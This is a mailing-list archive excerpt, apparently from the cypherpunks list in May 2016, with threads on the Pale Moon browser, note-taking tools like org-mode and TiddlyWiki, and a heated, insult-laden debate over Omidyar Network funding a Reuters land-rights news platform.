>>> >>> [drwho at windbringer bin]$ ls -alF /usr/lib/palemoon/palemoon >>> - -rwxr-xr-x 1 root root 240720 Apr 30 >> >> I just got the precompiled bz package - it's ~60mb uncompressed. >> It seems to be a bit better/faster than current firefox, plus it >> doesn't have the 'new' and 'improved' gui stuff... >> >> >> -------------- next part -------------- A non-text attachment was scrubbed... Name: 0xAE008E43.asc Type: application/pgp-keys Size: 3082 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 801 bytes Desc: OpenPGP digital signature URL: From rayzer at riseup.net Mon May 16 08:35:28 2016 From: rayzer at riseup.net (Rayzer) Date: Mon, 16 May 2016 08:35:28 -0700 Subject: What Omidyar's been up to... Message-ID: <5739E8C0.6090001@riseup.net> Fomenting media about indigenous land rights... Thomson Reuters Foundation launches Place to put land and property rights on global news agenda London (May 16, 2016) – The Thomson Reuters Foundation, the charity arm of the world’s largest news and information provider, today launched Place (Property, Land, Access, Connections, Empowerment), an innovative platform to boost coverage of land and property rights, one of the most under-reported issues worldwide. The new platform has been developed with support from Omidyar Network, the philanthropic investment firm founded by Pierre and Pam Omidyar. Insecurity of land tenure and property rights is a major cause of global poverty and inequality and is strongly linked to the realisation of many development goals, including food security, economic empowerment of women, and climate change mitigation. Place aims to generate and curate trusted news and information on these issues, highlighting some of the complex dynamics related to property rights with the aim of making the subject accessible to a broader audience. Place creates the world’s first global news team dedicated to coverage of land and property rights, and the launch of a new digital platform, featuring original articles, information, analysis and opinion pieces. The Thomson Reuters Foundation team will do reporting and will select and aggregate content, ensuring the site both informs and triggers debate. “The lack of ownership or tenure is one of the world’s most silent crises and one with dramatic ramifications. The denial of such basic rights leads to exploitation and financial instability; it can destroy livelihoods, create inequality and even foment conflict. It particularly affects women who are not allowed to own or even inherit land in many countries,” says Monique Villa, Chief Executive Officer of the Thomson Reuters Foundation. “Through the generous support of Omidyar Network, our news will play a significant role in starting a global conversation on the subject.” “The lack of property rights is not just a concern for developing countries,” says Peter Rabley, Director of the Property Rights initiative of Omidyar Network. “It poses a threat to global security by putting food supplies at risk, fuelling violence in ever-growing slums in major cities, reducing opportunity and economic empowerment, and increasing pressure on the environment. The issues linked to property rights are a concern for everyone, and this innovative project with the Thomson Reuters Foundation aims to address these issues by bringing them into the public domain and sparking a global discussion.” Thomson Reuters Foundation journalists and videographers in Africa, India, Brazil and Britain will work with over 100 freelancers to produce daily news addressing issues such as the lack of land rights and its consequences, corruption, land appropriation, food security and human rights abuses. The team will also produce interviews with frontline thought leaders and compelling micro-documentaries to engage viewers through visually striking investigative stories. The journalists are part of the larger editorial team at the Thomson Reuters Foundation, will report to Belinda Goldsmith, editor-in-chief, and will benefit from editorial guidance, mentorship, facilities and a global distribution network reaching an estimated audience of one billion readers a day. Content generated by the team will be featured on news.trust.org, the Thomson Reuters Foundation’s website, and on place.trust.org, the new platform dedicated to land and property rights. For more information on the project visit place.trust.org -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From drwho at virtadpt.net Mon May 16 10:56:31 2016 From: drwho at virtadpt.net (The Doctor) Date: Mon, 16 May 2016 10:56:31 -0700 Subject: LMAO at linux In-Reply-To: <20160516161327.GA26643@tau1.ceti.pl> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <20160515165513.807590f56de03b56f6ea122f@virtadpt.net> <20160516161327.GA26643@tau1.ceti.pl> Message-ID: <20160516105631.17914e379af7c85e7658ec0a@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On Mon, 16 May 2016 18:13:27 +0200 Tomasz Rola wrote: > I hear that org-mode is modern replacement for this... Actually, after > spending good time with org I would rather not go back to notes.txt. In recent years I've been using Tiddlywiki (http://tiddlywiki.com/) to manage notes for my projects, and I'm quite taken with it. I keep them checked into the appropriate Git repositories so not only are they versioned but they get pushed to my server along with the code. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ Squaresoft: Bringing you 32-bit unsigned integer damage counts since 1996. -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJXOgnPAAoJED1np1pUQ8RkAcUQAIUtgstPsx+LmfZz/FdkdppS m2uyDNRJGTgI2U5stYOZaD4bFz1DK6OfcUNFIE3STB2+owR3HxNLJp7QBk5bbIY1 jkdPObwXij0a9j0sW52bvk2rQh1MwCTMCYTE363/fMvHqGylwZ7aKEEotyVLe9Yy cRrbB7HcsUnfgyDljU0sswdgWnwZSzOioqeYTyrceSIHuZw8vhKkJQ63b49lK8D1 UZL+KoZPvEPXOmjNjIi6DtM23sgcZ0Q/rPUlOTuIiVQyLgS/NxoPCB+k5DtamFOh mko7kt725OrCoGORRNVLFyPhsG+9bhplJAItmFoxabyUT5JHXll//Ve5mQvIEl7Y Ric8Ahi9zN8+mwdmnW92DDoICzs7hKIqLUb7q4PWVH5TZnPR+ks0ECs48BtmA4Fs NO3QeW6/aUdkwwsPHn7daznHVY8DJ6w7UuzTOK7hc1nuwiShpurGkRC8l5xFhGv4 br4AEWtXjr7YtuqtbbyXhEPtu4thmpzf2ExpqBF9RCCoJAZE897spVrne4au7/WP anAYNbtRlO10lMhdVLPfG2hNo8DNaa3LvIQKmw2RCp9ZEoG6UD9ac/TnUypvhTkk qAM8NPOqO9pC3D+WWNZq3n1zSPd0st3bR2pltTWxZ9+D7w9MpLpx5Wp15dq16B72 HMrkPN8ztXZnKCr59OeP =VgYs -----END PGP SIGNATURE----- From s at ctrlc.hu Mon May 16 02:25:06 2016 From: s at ctrlc.hu (stef) Date: Mon, 16 May 2016 11:25:06 +0200 Subject: LMAO at linux In-Reply-To: <57390210.c6198c0a.b6fbe.ffff8712@mx.google.com> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <57367ee0.d09a370a.e7dfe.184d@mx.google.com> <5736A82F.5080801@riseup.net> <5736b140.ac688c0a.3b0dc.ffffa8aa@mx.google.com> <20160515145320.09cbd97bb41680dacc6131b6@virtadpt.net> <57390210.c6198c0a.b6fbe.ffff8712@mx.google.com> Message-ID: <20160516092505.GE25216@ctrlc.hu> On Sun, May 15, 2016 at 08:11:54PM +0000, juan wrote: > On Sun, 15 May 2016 14:53:20 -0700 > The Doctor > > > > > > Oh, and just for fun, here's Palemoon's (https://www.palemoon.org/) > > disk footprint: > > > > [drwho at windbringer bin]$ ls -alF /usr/lib/palemoon/palemoon > > - -rwxr-xr-x 1 root root 240720 Apr 30 > > > I just got the precompiled bz package - it's ~60mb uncompressed. > It seems to be a bit better/faster than current firefox, plus it > doesn't have the 'new' and 'improved' gui stuff... last time i checked the palemoon people don't backport any security fixes since their fork. that leaves a lot of potential open for any attacker. people on this list should have checked this 1st instead of being lame and whine about the size -- otr fp: https://www.ctrlc.hu/~stef/otr.txt From jason.mcvetta at gmail.com Mon May 16 12:09:03 2016 From: jason.mcvetta at gmail.com (J) Date: Mon, 16 May 2016 12:09:03 -0700 Subject: What Omidyar's been up to... In-Reply-To: <5739E8C0.6090001@riseup.net> References: <5739E8C0.6090001@riseup.net> Message-ID: > > Content generated by the team will be featured on news.trust.org, the > Thomson Reuters Foundation’s website, and on place.trust.org, the new > platform dedicated to land and property rights. > Who would possibly trust an organization whose domain name is "trust.org"? I know nothing else about this group, but from that fact alone it's obvious they are not to be trusted. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 795 bytes Desc: not available URL: From juan.g71 at gmail.com Mon May 16 12:57:54 2016 From: juan.g71 at gmail.com (juan) Date: Mon, 16 May 2016 16:57:54 -0300 Subject: pale moon In-Reply-To: <20160516092505.GE25216@ctrlc.hu> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <57367ee0.d09a370a.e7dfe.184d@mx.google.com> <5736A82F.5080801@riseup.net> <5736b140.ac688c0a.3b0dc.ffffa8aa@mx.google.com> <20160515145320.09cbd97bb41680dacc6131b6@virtadpt.net> <57390210.c6198c0a.b6fbe.ffff8712@mx.google.com> <20160516092505.GE25216@ctrlc.hu> Message-ID: <573a2617.0f608c0a.e2db3.1e49@mx.google.com> On Mon, 16 May 2016 11:25:06 +0200 stef wrote: > > last time i checked the palemoon people don't backport any security > fixes since their fork. that leaves a lot of potential open for any > attacker. people on this list should have checked this 1st instead of > being lame and whine about the size > https://www.palemoon.org/releasenotes.shtml They do mention security fixes there. (not saying they are to be 'trusted' tho) From rtomek at ceti.pl Mon May 16 09:13:27 2016 From: rtomek at ceti.pl (Tomasz Rola) Date: Mon, 16 May 2016 18:13:27 +0200 Subject: LMAO at linux In-Reply-To: <20160515165513.807590f56de03b56f6ea122f@virtadpt.net> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <20160515165513.807590f56de03b56f6ea122f@virtadpt.net> Message-ID: <20160516161327.GA26643@tau1.ceti.pl> On Sun, May 15, 2016 at 04:55:13PM -0700, The Doctor wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > On Sat, 14 May 2016 00:58:28 +0000 > Zenaan Harkness wrote: > > > This everything log sounds really convenient - almost as convenient as > > an rfid microchip in the wrist so you don't have to pull out the > > wallet when paying for something. > > You can always turn it off and write stuff down on notecards. Or install the > stickynote application of your choice. Failing that, I hear that ~/notes.txt > is traditional... I hear that org-mode is modern replacement for this... Actually, after spending good time with org I would rather not go back to notes.txt. -- Regards, Tomasz Rola -- ** A C programmer asked whether computer had Buddha's nature. ** ** As the answer, master did "rm -rif" on the programmer's home ** ** directory. And then the C programmer became enlightened... ** ** ** ** Tomasz Rola mailto:tomasz_rola at bigfoot.com ** From rayzer at riseup.net Mon May 16 18:39:16 2016 From: rayzer at riseup.net (Rayzer) Date: Mon, 16 May 2016 18:39:16 -0700 Subject: What Omidyar's been up to... In-Reply-To: References: <5739E8C0.6090001@riseup.net> Message-ID: <573A7644.3050307@riseup.net> On 05/16/2016 12:09 PM, J wrote: > > Content generated by the team will be featured on news.trust.org > , the > Thomson Reuters Foundation’s website, and on place.trust.org > , the new > platform dedicated to land and property rights. > > > Who would possibly trust an organization whose domain name is > "trust.org "? I know nothing else about this group, > but from that fact alone it's obvious they are not to be trusted. You don't know what Reuters is? This is the parent organization. The "Trust" moniker derives from the early 1900 and 1800s. It indicated a sort of conglomerate or coop approach to business. and those sorts of organizations often grew so large they were like monopolies. Hence the phrase: "Trust-Buster" http://www.ushistory.org/us/43b.asp -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2001 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From rayzer at riseup.net Mon May 16 18:40:41 2016 From: rayzer at riseup.net (Rayzer) Date: Mon, 16 May 2016 18:40:41 -0700 Subject: pale moon In-Reply-To: <573a2617.0f608c0a.e2db3.1e49@mx.google.com> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <57367ee0.d09a370a.e7dfe.184d@mx.google.com> <5736A82F.5080801@riseup.net> <5736b140.ac688c0a.3b0dc.ffffa8aa@mx.google.com> <20160515145320.09cbd97bb41680dacc6131b6@virtadpt.net> <57390210.c6198c0a.b6fbe.ffff8712@mx.google.com> <20160516092505.GE25216@ctrlc.hu> <573a2617.0f608c0a.e2db3.1e49@mx.google.com> Message-ID: <573A7699.8060106@riseup.net> On 05/16/2016 12:57 PM, juan wrote: > On Mon, 16 May 2016 11:25:06 +0200 > stef wrote: > >> last time i checked the palemoon people don't backport any security >> fixes since their fork. that leaves a lot of potential open for any >> attacker. people on this list should have checked this 1st instead of >> being lame and whine about the size >> > https://www.palemoon.org/releasenotes.shtml > > They do mention security fixes there. (not saying they are > to be 'trusted' tho) > It's the older distro that no longer updates. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From zen at freedbms.net Mon May 16 19:27:17 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Tue, 17 May 2016 02:27:17 +0000 Subject: What Omidyar's been up to... In-Reply-To: References: <5739E8C0.6090001@riseup.net> Message-ID: On 5/16/16, J wrote: >> >> Content generated by the team will be featured on news.trust.org, the >> Thomson Reuters Foundation’s website, and on place.trust.org, the new >> platform dedicated to land and property rights. >> > > Who would possibly trust an organization whose domain name is "trust.org"? > I know nothing else about this group, but from that fact alone it's obvious > they are not to be trusted. Intending to raise awareness of issues around the primary foundation of capitalism ("property rights") is not a bad thing per se. But I have concerns with this already - Reuters to me is MSM - 'a billion readers a day' - 'aims to generate and curate trusted news' yeah I'm sure they do, but is this something you say? - "the world’s first global news team dedicated to coverage of land and property rights" sounds like an agenda about to be pushed by the current MSM/ planetary power brokers - "the launch of a new digital platform" - GTFOOH, a new digital platform! aren't we all going to be impressed - Yee Haw people, someone's about to save the world (now where's an old Sega system) My greatest concern is that this media platform could be a foundation for promoting and facilitating changes which will empower capitalist opportunism enslaving people to a greater and greater degree - i.e. empowering those who already have monetary power in the world to increase their monetary power over those in the world who they currently have difficulty enslaving due to LACK of property ownership rights! Stability of community and family requires stability of: - access to clean water for drinking, cooking and growing food - right to use land to grow food - warmth, i.e. a roof and heating and cooking ability - and prosperity requires (I think) the right to freedom of free and anonymous travel. "Inordinate wealth" (i.e. enslaving other humans) can be achieved with property ownership - the owner then becomes a land lord, collecting rent; that's difficult to achieve with NO property ownership - i.e. if you're allowed to live in your house without paying rent, grow food without someone taking that food, and barter than food and your work efforts without being taxed and can travel freely, then you are essentially free - BUT land and property OWNERSHIP fucks that all up. Ownership of land per se is not a prerequisite to stable and abundant community, and indeed "ownership" of land has ultimately been the foundation of Western society's --massive-- wealth divide. Phrases like "rent seekers", opportunists, rates and taxation, leverage of capital and ultimately widespread economic slavery ought come to mind at this point... Russia is still giving plots of land to its people, and does not allow sale inside of the first 5 years of ownership. My view is that this time period should be greater, or perhaps documents should be made readily available so those who are inclined, protect said land for their grandchildren's use (and not sale) in a legal trust. (I'll grant the original marketing material is pretty slick, but bypasses a metric tonne of important, --foundation-- considerations; agenda or ignorance, take your pick.) From juan.g71 at gmail.com Mon May 16 22:36:03 2016 From: juan.g71 at gmail.com (juan) Date: Tue, 17 May 2016 02:36:03 -0300 Subject: What Omidyar's been up to... In-Reply-To: <5739E8C0.6090001@riseup.net> References: <5739E8C0.6090001@riseup.net> Message-ID: <573aad9a.024e370a.977df.1aba@mx.google.com> On Mon, 16 May 2016 08:35:28 -0700 Rayzer wrote: > > Fomenting media about indigenous land rights... > > omidyar and the reuters mafia babbling about 'land rights' make as much sense as jack the ripper lecturing on morality. From carimachet at gmail.com Mon May 16 19:36:26 2016 From: carimachet at gmail.com (Cari Machet) Date: Tue, 17 May 2016 05:36:26 +0300 Subject: What Omidyar's been up to... In-Reply-To: <573A7644.3050307@riseup.net> References: <5739E8C0.6090001@riseup.net> <573A7644.3050307@riseup.net> Message-ID: No reporter in north america Pierre gave over a million dollars to the cia to help eat the ukraine Maybe they are news gathering to scope out where the next good eats are On May 17, 2016 4:48 AM, "Rayzer" wrote: > > > On 05/16/2016 12:09 PM, J wrote: > > Content generated by the team will be featured on news.trust.org, the >> Thomson Reuters Foundation’s website, and on place.trust.org, the new >> platform dedicated to land and property rights. >> > > Who would possibly trust an organization whose domain name is "trust.org"? > I know nothing else about this group, but from that fact alone it's obvious > they are not to be trusted. > > > You don't know what Reuters is? This is the parent organization. > > The "Trust" moniker derives from the early 1900 and 1800s. It indicated a > sort of conglomerate or coop approach to business. and those sorts of > organizations often grew so large they were like monopolies. Hence the > phrase: "Trust-Buster" http://www.ushistory.org/us/43b.asp > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2200 bytes Desc: not available URL: From rayzer at riseup.net Tue May 17 08:13:44 2016 From: rayzer at riseup.net (Rayzer) Date: Tue, 17 May 2016 08:13:44 -0700 Subject: What Omidyar's been up to... In-Reply-To: <573aad9a.024e370a.977df.1aba@mx.google.com> References: <5739E8C0.6090001@riseup.net> <573aad9a.024e370a.977df.1aba@mx.google.com> Message-ID: <573B3528.1040703@riseup.net> On 05/16/2016 10:36 PM, juan wrote: > On Mon, 16 May 2016 08:35:28 -0700 > Rayzer wrote: > >> >> Fomenting media about indigenous land rights... >> >> > > omidyar and the reuters mafia babbling about 'land rights' make as > much sense as jack the ripper lecturing on morality. > > I sense you, like many fanatics, don't see the value of the 'small cracks' these sorts of things make in 'systems'. Let's talk conspiracy Juan, cause I KNOW you're bound to be one of those 'conspiracy nutjobs'. "Power Elite Conspiracies" exist but they are NOT overarching, cast in stone things with some 'plan' that made them happen. Conspiracies muddle through by hedging all bets. Any way the cards fall you win SOMETHING, and over time that something is at least additive if not geometrically or logarithmically enhanced. It's up to the proles to take advantage of the hedges that work for them. Because no one else is going to do it. Even the most perverse skewed reporting on an issue is better than none at all for too many reasons to enumerate here. If the proles can't figure out the media trap their ensnared in educate them. You'd just scoff. Hella solution. "I think people have the capacities to see through the deceit in which they're ensnared, but you've got to make the effort" ~Noam Chomsky He says so right here > https://www.youtube.com/watch?v=aIsZwGbi9g8 (snigger, that's Tom Morello's mama announcing.) Ah but you think Chomsky's a CIA 'operator' don't you Juan? And Tom Morello, and Zack De La Rocha, and Abbie Hoffman Karl Marx, Groucho Marx, and Trotsky too. I guess everyone should just give up and not do anything at all. BTW, USAID is on the list of foundation donors. The skew is EASY to see, and EASY to work around just by those agency's visibility in the organization. Rr -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From drwho at virtadpt.net Tue May 17 10:18:27 2016 From: drwho at virtadpt.net (The Doctor) Date: Tue, 17 May 2016 10:18:27 -0700 Subject: LMAO at linux In-Reply-To: <20160517150812.GA27472@tau1.ceti.pl> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <20160515165513.807590f56de03b56f6ea122f@virtadpt.net> <20160516161327.GA26643@tau1.ceti.pl> <20160516105631.17914e379af7c85e7658ec0a@virtadpt.net> <20160517150812.GA27472@tau1.ceti.pl> Message-ID: <20160517101827.48e6f987c7381ae825dfa99f@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On Tue, 17 May 2016 17:08:12 +0200 Tomasz Rola wrote: > "more advanced" stuff [1]. I think it is possible to edit some (other) > wiki with org-mode and send content to it without needing a browser, You could always write your notes in Markdown, which is pretty good for ad-hoc outlining and notetaking in my experience. I got in the habit a while ago and while it looks a little weird it's intuitive. Plus, if you really need to you can later render it into HTML, XML, or other document formats with something lPandoc (http://pandoc.org/). > which would be huge plus for me. And if I was in need of wiki then > maybe I would look for something which does not require Javascript (as > Tiddly seems to, but I only glanced over few pages and into one zip). Tiddly does need JavaScript, but it's entirely self-contained (i.e., it's a self-modifying HTML page; if you access one from a real web server you can't edit it, you can only view it). My threat model is such that JavaScript kept in a file sitting on my desktop while airgapped is fine; yours is yours. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "We are stuck with technology when what we really want is just stuff that works." --Douglas Adams -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJXO1JjAAoJED1np1pUQ8RkJ1IP/2duL7EEmevOXk6PblPqbEfR avteXOnyPy9gT8p0AQNuiP3sBff7N4v/BfGLKlueFhr0oH4qMTZ5ZauK8Vzp1DAM qCUDxKKZVktqgpKvRvY9Dj/oFu+SyROCuHLiglwlg2I6pwM1TtHYk4qYxbwS/dzc wXVsQCC4jrIslNlX5mnCcx8Eu2EcS+AKNxAjOPsHJ+WX8yiclF9Ud+1xpnlczTj4 NjanuQ9wvJoB2au4AkJ0zdOMAZnyRTcH6Pk629fMDnpevTALz4G9zP0q8La0aP4/ JWWFsM040w6cAARO9JYYeYwIIS/D+hIZnBjydgCT+qwOTM+6MqysWAXtSeLFX4t0 85NpgtRKBu6fOkt6M71hATIiB1mz/iNejamClj83gTNV0qw3GXe6YsT9yL+2cUKR +Hf2LxAlVCwY4hui3sgaGdMFZi8pGGtdYfB/CvuKRiy86L84gDi+mUctnY17gS0m h99F8SuFiCZDXvFuTBQYw4zQWo76gELFJXuTcK4LMpne4AjPJF7rftTRQOAKve62 43MNYwm41w7m6dGfoeYSG2lIdJk8D0Rf9QnbDZeEaTObDcvaXMAQ+wRw07/3FyVs akmKoquUB6zKnHrUcCWx9CB169xO3IMG7OmK7zqISQBTwMvg4YBA94omvUU3jOrD /Cyk6RQQmZ0AY3OMtko1 =m+iW -----END PGP SIGNATURE----- From rtomek at ceti.pl Tue May 17 08:08:12 2016 From: rtomek at ceti.pl (Tomasz Rola) Date: Tue, 17 May 2016 17:08:12 +0200 Subject: LMAO at linux In-Reply-To: <20160516105631.17914e379af7c85e7658ec0a@virtadpt.net> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <20160515165513.807590f56de03b56f6ea122f@virtadpt.net> <20160516161327.GA26643@tau1.ceti.pl> <20160516105631.17914e379af7c85e7658ec0a@virtadpt.net> Message-ID: <20160517150812.GA27472@tau1.ceti.pl> On Mon, May 16, 2016 at 10:56:31AM -0700, The Doctor wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > On Mon, 16 May 2016 18:13:27 +0200 > Tomasz Rola wrote: > > > I hear that org-mode is modern replacement for this... Actually, > > after spending good time with org I would rather not go back to > > notes.txt. > > In recent years I've been using Tiddlywiki (http://tiddlywiki.com/) > to manage notes for my projects, and I'm quite taken with it. I > keep them checked into the appropriate Git repositories so not only > are they versioned but they get pushed to my server along with the > code. Looks nice. I guess you have your reason to make such choices and perhaps I will try it myself one day. For now however, and in my case, emacs does the job (keeping some activity log/record, notes, maybe todo lists, maybe pieces of code - it seems there are some extremely cool things possible when mixing code into org) so I tend to avoid "more advanced" stuff [1]. I think it is possible to edit some (other) wiki with org-mode and send content to it without needing a browser, which would be huge plus for me. And if I was in need of wiki then maybe I would look for something which does not require Javascript (as Tiddly seems to, but I only glanced over few pages and into one zip). YMMV, of course. [1] Well, ok, if I see something as more advanced, I would at least try to include it into my toolbox etc etc. My current needs are such that emacs (and elisp) appear to be more advanced (compared to browser and JS). But I have no intent to evangelize people about it. -- Regards, Tomasz Rola -- ** A C programmer asked whether computer had Buddha's nature. ** ** As the answer, master did "rm -rif" on the programmer's home ** ** directory. And then the C programmer became enlightened... ** ** ** ** Tomasz Rola mailto:tomasz_rola at bigfoot.com ** From juan.g71 at gmail.com Tue May 17 13:16:25 2016 From: juan.g71 at gmail.com (juan) Date: Tue, 17 May 2016 17:16:25 -0300 Subject: What Omidyar's been up to... In-Reply-To: <573B3528.1040703@riseup.net> References: <5739E8C0.6090001@riseup.net> <573aad9a.024e370a.977df.1aba@mx.google.com> <573B3528.1040703@riseup.net> Message-ID: <573b7bec.8550370a.ca9c6.ffff8780@mx.google.com> On Tue, 17 May 2016 08:13:44 -0700 Rayzer wrote: > > > On 05/16/2016 10:36 PM, juan wrote: > > On Mon, 16 May 2016 08:35:28 -0700 > > Rayzer wrote: > > > >> > >> Fomenting media about indigenous land rights... > >> > >> > > > > omidyar and the reuters mafia babbling about 'land rights' make as > > much sense as jack the ripper lecturing on morality. > > > > > > I sense you, like many fanatics, don't see the value of the 'small > cracks' these sorts of things make in 'systems'. Oh, I do see the value of what your master omidyar does. I know qute well how propaganda works. The 'cracks' in the system are useful to keep the fake opposition happy. "Controlled opposition" Look it up. In wikipedia. > Let's talk conspiracy Juan, cause I KNOW you're bound to be one of > those 'conspiracy nutjobs'. Ok. So I'm a 'fanatic nutjob'. I'd rather be that instead of an omidyar lapdog. > > "Power Elite Conspiracies" exist but they are NOT overarching, cast > in stone things with some 'plan' that made them happen. Conspiracies > muddle through by hedging all bets. Any way the cards fall you win > SOMETHING, and over time that something is at least additive if not > geometrically or logarithmically enhanced. Handwaving and bullshit. > > It's up to the proles to take advantage of the hedges that work for > them. Because no one else is going to do it. Even the most perverse > skewed reporting on an issue is better than none at all for too many > reasons to enumerate here. Sure, sure, sure. How could I have missed the invaluable value of establishment propaganda? Silly me. > > If the proles can't figure out the media trap their ensnared in > educate them. You'd just scoff. Hella solution. > > "I think people have the capacities to see through the deceit in which > they're ensnared, but you've got to make the effort" ~Noam Chomsky > > He says so right here > > https://www.youtube.com/watch?v=aIsZwGbi9g8 > (snigger, that's Tom Morello's mama announcing.) > > Ah but you think Chomsky's a CIA 'operator' don't you Juan? I know chomsky is a sick piece of shit. I aldready provided the data. Here it goes again. http://www.hoover.org/research/noam-chomsky-closet-capitalist http://www.celebritynetworth.com/richest-celebrities/authors/noam-chomsky-net-worth/ > And Tom Morello, and Zack De La Rocha, and Abbie Hoffman Karl Marx, > Groucho Marx, and Trotsky too. lol rayzer - you are a cheap marxist - you can't get more totalitarian than that. go kill people who don't obey The State's Traffic Laws. > > I guess everyone should just give up and not do anything at all. > > BTW, USAID is on the list of foundation donors. The skew is EASY to > see, and EASY to work around just by those agency's visibility in the > organization. > > Rr > > > From carimachet at gmail.com Tue May 17 08:33:14 2016 From: carimachet at gmail.com (Cari Machet) Date: Tue, 17 May 2016 17:33:14 +0200 Subject: What Omidyar's been up to... In-Reply-To: <573B3528.1040703@riseup.net> References: <5739E8C0.6090001@riseup.net> <573aad9a.024e370a.977df.1aba@mx.google.com> <573B3528.1040703@riseup.net> Message-ID: usaid has no connect to the cia right and the us does no nation building reagan and nixon were smart people with smart admins wake up one thing - the fuck they build in the world can be utilized by others yes but not too close getting On Tue, May 17, 2016 at 5:13 PM, Rayzer wrote: > > > On 05/16/2016 10:36 PM, juan wrote: > > On Mon, 16 May 2016 08:35:28 -0700 > > Rayzer wrote: > > > >> > >> Fomenting media about indigenous land rights... > >> > >> > > > > omidyar and the reuters mafia babbling about 'land rights' make as > > much sense as jack the ripper lecturing on morality. > > > > > > I sense you, like many fanatics, don't see the value of the 'small > cracks' these sorts of things make in 'systems'. > > Let's talk conspiracy Juan, cause I KNOW you're bound to be one of those > 'conspiracy nutjobs'. > > "Power Elite Conspiracies" exist but they are NOT overarching, cast in > stone things with some 'plan' that made them happen. Conspiracies muddle > through by hedging all bets. Any way the cards fall you win SOMETHING, > and over time that something is at least additive if not geometrically > or logarithmically enhanced. > > It's up to the proles to take advantage of the hedges that work for > them. Because no one else is going to do it. Even the most perverse > skewed reporting on an issue is better than none at all for too many > reasons to enumerate here. > > If the proles can't figure out the media trap their ensnared in educate > them. You'd just scoff. Hella solution. > > "I think people have the capacities to see through the deceit in which > they're ensnared, but you've got to make the effort" ~Noam Chomsky > > He says so right here > > https://www.youtube.com/watch?v=aIsZwGbi9g8 > (snigger, that's Tom Morello's mama announcing.) > > Ah but you think Chomsky's a CIA 'operator' don't you Juan? > And Tom Morello, and Zack De La Rocha, and Abbie Hoffman Karl Marx, > Groucho Marx, and Trotsky too. > > I guess everyone should just give up and not do anything at all. > > BTW, USAID is on the list of foundation donors. The skew is EASY to see, > and EASY to work around just by those agency's visibility in the > organization. > > Rr > > > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4218 bytes Desc: not available URL: From juan.g71 at gmail.com Tue May 17 13:52:04 2016 From: juan.g71 at gmail.com (juan) Date: Tue, 17 May 2016 17:52:04 -0300 Subject: What Omidyar's been up to... In-Reply-To: <5739E8C0.6090001@riseup.net> References: <5739E8C0.6090001@riseup.net> Message-ID: <573b8447.13dc8c0a.8cc0e.ffff8d92@mx.google.com> Omidyar's been running the anti-free-market abomination known as 'ebay' for 20 years(!). That makes omidyar a pioneer of the electronic police state. It should be pretty obvious that omidyar's been in bed with the 'national' 'security' mafia since day zero. Let me know when the shitbag 'leaks' the docs about his long collaboration with the state. I'm sure they'll get published on the intercept - greenwald will write an article. From juan.g71 at gmail.com Tue May 17 15:43:04 2016 From: juan.g71 at gmail.com (juan) Date: Tue, 17 May 2016 19:43:04 -0300 Subject: What Omidyar's been up to... In-Reply-To: References: <5739E8C0.6090001@riseup.net> <573aad9a.024e370a.977df.1aba@mx.google.com> <573B3528.1040703@riseup.net> <573b7bec.8550370a.ca9c6.ffff8780@mx.google.com> Message-ID: <573b9e4b.88c48c0a.2060f.ffff9c97@mx.google.com> On Tue, 17 May 2016 23:15:57 +0200 Cari Machet wrote: > Thank you rayzor for your ignorant ego ways otherwise we wouldnt get > to read juans brilliance as often Thanks for the undeserved compliment Cari. I feel embarrased =P You certainly don't need me to tell you that omidyar isn't a freedom fighter, but I appreciate your moral support. > On May 17, 2016 11:20 PM, "juan" wrote: > > On Tue, 17 May 2016 08:13:44 -0700 > Rayzer wrote: > From juan.g71 at gmail.com Tue May 17 17:48:11 2016 From: juan.g71 at gmail.com (juan) Date: Tue, 17 May 2016 21:48:11 -0300 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? Message-ID: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> I'll hazard : 20 years. http://www.bbc.com/news/uk-35972480 From carimachet at gmail.com Tue May 17 14:15:57 2016 From: carimachet at gmail.com (Cari Machet) Date: Tue, 17 May 2016 